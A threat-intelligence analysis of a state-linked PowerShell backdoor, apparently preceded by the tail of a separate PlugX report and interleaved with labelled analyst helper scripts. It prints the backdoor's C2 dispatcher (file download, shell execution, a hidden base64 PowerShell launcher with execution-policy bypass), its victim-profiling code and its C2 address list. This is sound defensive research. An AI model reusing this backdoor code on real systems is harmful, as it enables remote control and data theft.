(ATT&CK matrix figure with columns Recon, Weaponization, Delivery, Exploit, Install, Command and Objective)

Indicators of Compromise

PlugX Trinity Hashes (SHA-256)

PlugX RAT Full Dropper
e9b12791e0ab3a952fa09afd29e5a1416abd917edf5c913af7573adf8ccc39b0

PlugX Trinity – Legitimate signed executables
fafb6ffd3ffcf414b702354f62a5216351af4566ed61ece7784846a6938bb8d9
36d76999e9090c99fae2388cd3476134464807fc597f67c60eebc76e32339683

PlugX Trinity – Shellcode files
2201C3AC955148A078D366DC1E9F552FCA4A872756D3B6DA93494CDE8D5DECD5
5664334F2DE563B9F8978B7E33AED4526F96D6D9751F1204D7FBBF659C4F0F7B

References

[1] https://www.mci.gov.sg/coireport
[2] https://www.symantec.com/blogs/threat-intelligence/whitefly-espionage-singapore
[3] https://www.kaspersky.com/about/press-releases/2018_chinese-speaking-apt-actor-caught-spying-on-pharmaceutical-organizations
[4] https://docs.microsoft.com/en-us/windows/desktop/dlls/dynamic-link-library-search-order#standard-search-order-for-desktop-applications
[5] https://citizenlab.ca/2012/09/human-rights-groups-targeted-by-plugx-rat/
[6] https://sophosnews.files.wordpress.com/2013/07/sophosszappanosplugxrevisitedintroducingsmoaler-rev1.pdf
[7] https://unit42.paloaltonetworks.com/unit42-paranoid-plugx/
[8] https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii.html

SectorD02 PowerShell Backdoor Analysis

Overview

SectorD02 is a state sponsored threat actor group which mainly targets governments and organizations around the Middle East. In this case, the target of this malware was Turkey, although it has been reported that they also sometimes target countries outside of the Middle East. One characteristic of SectorD02 is their incrementally changing PowerShell backdoor.

We came across two such SectorD02 backdoors at the end of 2018, analyzed the variants and identified them as the group’s PowerShell malware. SectorD02 focuses on using PowerShell scripts to carry out their attacks, loading those scripts through layers of obfuscation by a variety of methods. One such method is PS2EXE (PowerShell to EXE), and our review of public reporting shows they have used this vector from time to time [1] since their attacks were first grouped and given a name [2].

PowerShell Backdoor

Both versions of the PS2EXE backdoors we came across end up executing exactly the same PowerShell script (including the same victim ID); the main difference seems to be that they were compiled seconds apart yet have different linker versions.

| Hash (SHA-256) | Compile Timestamp | Linker Version |
|---|---|---|
| 4cdf04c09d144c0c1b5ec7ac91009548db1546e1d1ed4d6fbfb64942a0bd0394 | 14.10.2018 09:20:03 | 8.0 (.NET 2) |
| d95fada028969497d732771c4220e956a94a372e3fd543ba4d53b9a927cabe1c | 14.10.2018 09:20:20 | 10.0 (.NET 4) |

This is a strange scenario and seems to indicate that the attacker had likely either introduced build automation into its malware creation process or had more than one employee/machine/environment for creating builds for distribution and did so almost at the same time. However, since SectorD02 is constantly changing their methods of producing malware and the scripts themselves, it does not make any economical sense to automate this in a build and we have not seen evidence of it elsewhere, so the latter is what we believe to be the most likely scenario.

After extracting the encoded PowerShell script from the PS2EXE executable, the first thing we see is some Hebrew text stored in two variables. These same unused variables have been left in other variants of their backdoor reported by others, but this is completely meaningless, as the attackers have even left Chinese text in earlier samples [3].

Some of the things we see in this version are:

  • Setting the hidden and system attributes on svchost.html, svchost.zip and svchosts.exe in the C:\Windows directory. Similar-sounding filenames/extensions have been reported in use by this group elsewhere [4], indicating that there are other pieces of malware in the same attack that we are not yet aware of.
  • First persistence: a standard HKLM Run registry key named "WindowsDefender" with the value "c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\Windows\svchost.html,svchost,1,".
  • Second persistence: a scheduled task with the same value as above, under "Microsoft\WindowsMapsUpdateInfo".
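As an added illustration (not code from the report), the following Python script triages a list of autorun entries for the two persistence mechanisms above. The sample entries are constructed to look like an autoruns export; the only values taken from the report are the rundll32/advpack.dll,LaunchINFSection command line, the svchost.html path and the two autorun names. Because rundll32 advpack.dll,LaunchINFSection is a generic INF launcher, the script treats that pattern as a lead and only adds weight when the INF path or the autorun name also matches.

```python
import re

# Added example, not code from the report: triage autorun entries for the two
# persistence mechanisms described above. SAMPLE_AUTORUNS is constructed data
# shaped like an autoruns export (source, name, command); on a real host the
# entries come from the HKLM Run key and the Task Scheduler.

# rundll32 advpack.dll,LaunchINFSection is a generic "run an INF section"
# launcher, so the pattern alone is a lead that needs the INF path checked.
ADVPACK_LAUNCHINF = re.compile(
    r"rundll32(?:\.exe)?\s+advpack\.dll\s*,\s*LaunchINFSection\b", re.IGNORECASE
)
# The INF this variant launches sits in C:\Windows under a system-looking name.
SVCHOST_INF = re.compile(r"\\svchost\.html\b", re.IGNORECASE)

# Autorun names the report attributes to this variant (compared case-insensitively).
KNOWN_NAMES = {
    "run_key": {"windowsdefender"},
    "scheduled_task": {r"microsoft\windowsmapsupdateinfo"},
}


def classify_autorun(entry):
    """Return the reasons an autorun entry resembles this backdoor's
    persistence; an empty list means nothing matched."""
    reasons = []
    command = entry.get("command", "")
    if ADVPACK_LAUNCHINF.search(command):
        reasons.append("advpack.dll,LaunchINFSection launcher")
        if SVCHOST_INF.search(command):
            reasons.append("INF payload named svchost.html")
    known = KNOWN_NAMES.get(entry.get("source", ""), set())
    if entry.get("name", "").lower() in known:
        reasons.append("autorun name matches reported variant")
    return reasons


def triage(entries):
    """Keep only entries with at least one reason, as (name, reasons) pairs."""
    hits = []
    for entry in entries:
        reasons = classify_autorun(entry)
        if reasons:
            hits.append((entry["name"], reasons))
    return hits


# Constructed sample: the two reported entries, a benign Run entry, and a
# benign-looking driver install that happens to use the same launcher.
SAMPLE_AUTORUNS = [
    {"source": "run_key", "name": "WindowsDefender",
     "command": r"c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\Windows\svchost.html,svchost,1,"},
    {"source": "scheduled_task", "name": r"Microsoft\WindowsMapsUpdateInfo",
     "command": r"c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\Windows\svchost.html,svchost,1,"},
    {"source": "run_key", "name": "OneDrive",
     "command": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},
    {"source": "scheduled_task", "name": r"Vendor\DriverSetup",
     "command": r"rundll32.exe advpack.dll,LaunchINFSection C:\setup\driver.inf,DefaultInstall"},
]

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_AUTORUNS):
        print(name, "->", "; ".join(reasons))
```

Running the script flags the two reported entries with all three reasons and the driver install with the launcher reason alone, which is the distinction an analyst needs before escalating.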

Creating the Victim ID

As usual, they follow their established mechanism for generating the victim ID from a combination of information taken from the victim machine. A similar mechanism has been seen since early last year [5]. Recently, other researchers found a different version that used "::" as a separator instead of "**" [6], but it is hard to say whether that malware was made by the same group.

    $SysInfo = getOS
    $SysInfo += "**"
    $SysInfo += getIP
    $SysInfo += "**"
    $SysInfo += getArch
    $SysInfo += "**"
    $SysInfo += getHostName
    $SysInfo += "**"
    $SysInfo += getDomain
    $SysInfo += "**"
    $SysInfo += isAdmin        # no separator between isAdmin and the username
    $SysInfo += getUsername
    $SysInfo += "**"
    $SysInfo += getPIP
    $global:id = md5generator($SysInfo)
    return ($global:id + '**' + $SysInfo)
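To make the beacon format concrete, here is an added Python helper (not code from the report) that rebuilds the $SysInfo string with the same field order and separators as the script above, and parses a captured beacon back into its fields while checking that the leading victim ID is the MD5 of the rest. The separator is a parameter so the "::" variant from [6] parses too. All host values are constructed, and the assumption that md5generator returns a lowercase hex digest is marked in the code, since its body is not shown on the page.

```python
import hashlib

# Added example, not code from the report: rebuild and parse the beacon
# format implied by the script above so a captured beacon can be split into
# its fields and its victim ID checked. Sample values are constructed.

FIELDS = ("os", "ip", "arch", "hostname", "domain", "isadmin_username", "public_ip")


def build_sysinfo(os_, ip, arch, hostname, domain, isadmin, username, public_ip, sep="**"):
    """Concatenate the fields exactly as the script does. isAdmin and the
    username are appended with no separator between them, so they travel as
    a single field."""
    return sep.join([os_, ip, arch, hostname, domain, isadmin + username, public_ip])


def build_beacon(sysinfo, sep="**"):
    """Victim ID is md5generator($SysInfo); the beacon is id + sep + $SysInfo.
    Assumption: md5generator emits a lowercase hex digest (its body is not shown)."""
    return hashlib.md5(sysinfo.encode("utf-8")).hexdigest() + sep + sysinfo


def parse_beacon(beacon, sep="**"):
    """Split a beacon into (victim_id, fields, id_matches).

    sep defaults to this variant's '**'; pass '::' for the variant in [6].
    Raises ValueError if the segment count does not fit the format, which
    also happens if a field itself contains the separator."""
    parts = beacon.split(sep)
    if len(parts) != 1 + len(FIELDS):
        raise ValueError(
            "expected %d %r-separated segments, got %d" % (1 + len(FIELDS), sep, len(parts))
        )
    victim_id, sysinfo_parts = parts[0], parts[1:]
    sysinfo = sep.join(sysinfo_parts)
    expected = hashlib.md5(sysinfo.encode("utf-8")).hexdigest()
    return victim_id, dict(zip(FIELDS, sysinfo_parts)), victim_id.lower() == expected


# Constructed sample host; none of these values come from the report.
SAMPLE_SYSINFO = build_sysinfo(
    "Microsoft Windows 10 Pro", "10.20.30.40", "64-bit", "WS-FINANCE-07",
    "corp.example", "False", "jdoe", "198.51.100.23",
)
SAMPLE_BEACON = build_beacon(SAMPLE_SYSINFO)

if __name__ == "__main__":
    vid, fields, ok = parse_beacon(SAMPLE_BEACON)
    print(vid, "id matches:", ok)
    for key, value in fields.items():
        print(" ", key, "=", value)
```

The ID check is a cheap way to confirm that a suspect string in proxy logs really is one of these beacons rather than a coincidental "**"-delimited string, and the merged isadmin_username field is a reminder that the privilege flag has to be split off by hand.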

C2 Commands

When the group is not changing their malware's functionality, they are at least constantly renaming items in their scripts. In this variant we see the commands "upload", "cmd", "b64" and "muddy".

    function command_and_control($cmd){
        try{
            # "upload <url>": fetch a file into c:\programdata (the Substring keeps the leading '/')
            if($cmd.StartsWith('upload')){
                try{
                    $cmd=$cmd.replace('upload ','')
                    $wc = New-Object System.Net.WebClient
                    $wc.proxy = [Net.WebRequest]::GetSystemWebProxy()
                    $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
                    $wc.DownloadFile($cmd, ("c:\programdata\" + $cmd.Substring($cmd.LastIndexOf('/'),$cmd.Length-$cmd.LastIndexOf('/'))))
                    return Eval "pwd"
                }catch{
                    return $_.Exception.Message
                }
            }
            # "cmd <command>": run through cmd.exe and return the output
            elseif($cmd.StartsWith('cmd')){
                $cmd=$cmd.replace('cmd ','')
                try{
                    $out = cmd /c $cmd
                    $out = $out | Out-String
                    return $out
                } catch {
                    return $_.Exception.Message
                }
            }
            # "b64 <base64>": decode and evaluate as PowerShell
            elseif($cmd.StartsWith('b64')){
                $cmd=$cmd.replace('b64 ','')
                try{
                    $cmd = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($cmd))
                    $out = Eval $cmd
                    $out = $out | Out-String
                    return $out
                } catch {
                    return $_.Exception.Message
                }
            }
            # "muddy <url>": fetch a second-stage script to c:\programdata\LSASS and launch a
            # hidden powershell.exe whose (base64-encoded) arguments decode and run it
            elseif($cmd.StartsWith('muddy')){
                $cmd=$cmd.replace('muddy ','')
                $cmd = shttpGET($cmd)
                set-content -path "c:\programdata\LSASS" -value $cmd
                try{
                    Start-Process powershell -ArgumentList ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("LWV4ZWMgQnlwYXNzIC1jICRzPShnZXQtY29udGVudCBjOlxwcm9ncmFtZGF0YVxMU0FTUyk7JGQgPSBAKCk7JHYgPSAwOyRjID0gMDt3aGlsZSgkYyAtbmUgJHMubGVuZ3RoKXskdj0oJHYqNTIpKyhbSW50MzJdW2NoYXJdJHNbJGNdLTQwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtpZXgoW1N0cmluZ106OkpvaW4oJycsJGQpKTs="))) -WindowStyle Hidden
                    return (Eval "ls c:\programdata")
                } catch {
                    return $_.Exception.Message
                }
            }
            # anything else is evaluated directly as PowerShell
            else {
                return Eval $cmd
            }
        } catch{
            return $_.Exception.Message
        }
    }
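The most interesting part of the dispatcher is the base64 string handed to Start-Process in the "muddy" branch. The following added Python helper (ours, not code from the report or the malware) decodes that string, copied verbatim from the function above, and pulls out what a defender wants to know from it: whether it bypasses the execution policy, which file it reads, and whether it ends in Invoke-Expression. It also classifies task strings the way the dispatcher does, and reproduces the "upload" branch's path arithmetic, which leaves a stray forward slash in the written path. The "hxxp://c2.example" URL in the usage section is a constructed placeholder, not an indicator from the report.

```python
import base64
import re

# Added analyst helper, not code from the report or the malware. It operates
# on strings quoted in the function above: the base64 argument handed to
# Start-Process in the 'muddy' branch, the verb prefixes the dispatcher
# checks, and the path arithmetic of the 'upload' branch.

# Copied verbatim from the Start-Process call in command_and_control.
MUDDY_LAUNCH_B64 = (
    "LWV4ZWMgQnlwYXNzIC1jICRzPShnZXQtY29udGVudCBjOlxwcm9ncmFtZGF0YVxMU0FTUyk7JGQgPSBAKCk7JHYgPSAwOyRjID0g"
    "MDt3aGlsZSgkYyAtbmUgJHMubGVuZ3RoKXskdj0oJHYqNTIpKyhbSW50MzJdW2NoYXJdJHNbJGNdLTQwKTtpZigoKCRjKzEpJTMp"
    "IC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJ"
    "bnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtpZXgoW1N0cmluZ106OkpvaW4oJycsJGQpKTs="
)

# Verb prefixes tested by the dispatcher, in the order it tests them.
VERBS = ("upload", "cmd", "b64", "muddy")


def decode_launch_args(b64=MUDDY_LAUNCH_B64):
    """Base64-decode the hidden powershell.exe argument string, exactly as the
    backdoor does with [Convert]::FromBase64String before Start-Process."""
    return base64.b64decode(b64).decode("ascii")


def summarize_launcher(args):
    """Pull out what a defender wants from the decoded argument string: an
    execution-policy bypass, the files it reads, and whether it finishes by
    handing the decoded text to Invoke-Expression (iex)."""
    return {
        "bypasses_execution_policy": bool(
            re.search(r"-exec(?:utionpolicy)?\s+bypass", args, re.IGNORECASE)),
        "reads_files": re.findall(r"get-content\s+([^\s);]+)", args, re.IGNORECASE),
        "invokes_decoded_script": bool(re.search(r"\biex\s*\(", args, re.IGNORECASE)),
    }


def dispatch(task):
    """Classify a C2 task string the way the dispatcher does: the first verb
    that matches as a prefix wins and, like the script's .replace(), every
    occurrence of 'verb ' is stripped; anything unmatched falls through to
    Eval, so an unknown task is still executed as PowerShell."""
    for verb in VERBS:
        if task.startswith(verb):
            return verb, task.replace(verb + " ", "")
    return "eval", task


def upload_target_path(url):
    """Mirror the 'upload' branch: c:\\programdata\\ + Substring(LastIndexOf('/'), ...).
    The substring starts at the slash itself, so the written path keeps a
    stray forward slash; file-creation telemetry can match on that shape."""
    idx = url.rfind("/")
    return "c:\\programdata\\" + url[idx:]


if __name__ == "__main__":
    args = decode_launch_args()
    print(args)
    print(summarize_launcher(args))
    print(dispatch("cmd whoami"), dispatch("Get-Process"))
    # constructed, defanged placeholder URL; not an indicator from the report
    print(upload_target_path("hxxp://c2.example/files/tool.exe"))
```

Decoding shows a `-exec Bypass -c` launcher that reads c:\programdata\LSASS, runs it through a small custom decoding loop and passes the result to iex, so the second stage never touches disk in readable form; the file write to c:\programdata\LSASS and the hidden powershell.exe child with a long argument string are the observable points.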

Random Proxy

This variant has four C2 IP addresses and picks one of them at random. These IP addresses were used in other attacks around the same time as well [1]. As usual, these C2 servers are likely simply compromised servers, as before [7], something the attackers themselves acknowledge by referring to the servers as proxies.

    $C = @('hxxp://78[.]129[.]139[.]148','hxxp://79[.]106[.]224[.]203','hxxp://104[.]237[.]233[.]17','hxxp://185[.]34[.]16[.]82')
    function getRandomProxy(){
        $rnd = Get-Random -minimum 0 -maximum ($C.Length)
        $global:url = $C[$rnd]
    }

Interestingly, even at the time of writing, two of the proxy C2 servers (79[.]106[.]224[.]203 and 185[.]34[.]16[.]82) still had the "MikroTik bandwidth-test server" enabled on port 2000, which could have been how the servers were compromised and turned into C2 servers.

Summary

SectorD02 is one of those groups to which attacks are much harder to attribute, because attribution based solely or heavily on technical indicators from the malware simply does not work. We have discussed this before in a previous post [8]; although this backdoor can be considered custom malware, it might as well be open source, because it is so easy for others to modify and reuse it for their own attacks.

Indicators of Compromise

Hashes (SHA-256)

4cdf04c09d144c0c1b5ec7ac91009548db1546e1d1ed4d6fbfb64942a0bd0394
d95fada028969497d732771c4220e956a94a372e3fd543ba4d53b9a927cabe1c

IPs

78[.]129[.]139[.]148
79[.]106[.]224[.]203
104[.]237[.]233[.]17
185[.]34[.]16[.]82

References

[1] https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group
[2] https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east
[3] https://securelist.com/muddywater/88059
[4] https://www.emanueledelucia.net/site/files/2018/10/muddywater.pdf
[5] https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html
[6] https://blog.trendmicro.com/trendlabs-security-intelligence/new-powershell-based-backdoor-found-in-turkey-strikingly-similar-to-muddywater-tools/
[7] https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/
[8] https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/